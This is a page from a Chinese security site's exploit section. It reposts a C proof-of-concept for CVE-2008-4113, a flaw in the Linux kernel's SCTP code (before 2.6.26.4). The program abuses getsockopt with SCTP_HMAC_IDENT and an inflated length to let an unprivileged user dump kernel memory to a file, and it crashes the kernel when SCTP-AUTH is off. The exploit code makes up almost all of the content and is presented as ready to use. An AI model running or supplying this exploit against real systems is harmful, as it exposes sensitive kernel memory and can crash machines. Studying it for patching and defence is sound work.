首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit 来源：http://jon.oberheide.org 作者：Oberheide 发布时间：2008-12-30   /* * cve-2008-4113.c * * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 * *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream *   Control Transmission Protocol (sctp) implementation in the Linux kernel *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an *   untrusted length value to limit copying of data from kernel memory, which *   allows local users to obtain sensitive information via a crafted *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function. * * Notes: * *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will *   trigger a kernel OOPS. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/sctp.h> #ifndef SCTP_HMAC_IDENT #define SCTP_HMAC_IDENT 22 #endif #define DUMP_SIZE 256*1024 #define DUMP_FILE "mem.dump" int main(int argc, char **argv) { int ret, sock; FILE *dumpfile; char *memdump, *err; socklen_t memlen = DUMP_SIZE; memdump = malloc(DUMP_SIZE); if (!memdump) { err = "malloc(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } memset(memdump, 0, DUMP_SIZE); printf("[+] creating IPPROTO_SCTP socket\n"); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); if (sock == -1) { err = "socket(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen); ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen); if (ret == -1) { err = "getsockopt(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE); dumpfile = fopen(DUMP_FILE, "wb"); if (!dumpfile) { err = "fopen(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } fwrite(memdump, 1, memlen, dumpfile); fclose(dumpfile); printf("[+] done.\n"); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SasCam WebCam Server 2.6.5 Act ·Megacubo 5.0.7 (mega://) Remot ·CMS NetCat 3.0/3.12 Blind SQL ·Safari (Webkit) version 3.2 re ·IntelliTamper 2.07/2.08 (Proxy ·Mozilla Firefox version 3.0.5 ·Ultimate PHP Board <= 2.2.1 (l ·apache 1.x <=> 2.x suphp (suPH ·TaskDriver <= 1.3 Remote Chang ·Flexphplink Pro Arbitrary File ·Megacubo 5.0.7 (mega://) Remot ·EggBlog 3.1.10 Change Admin Pa   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved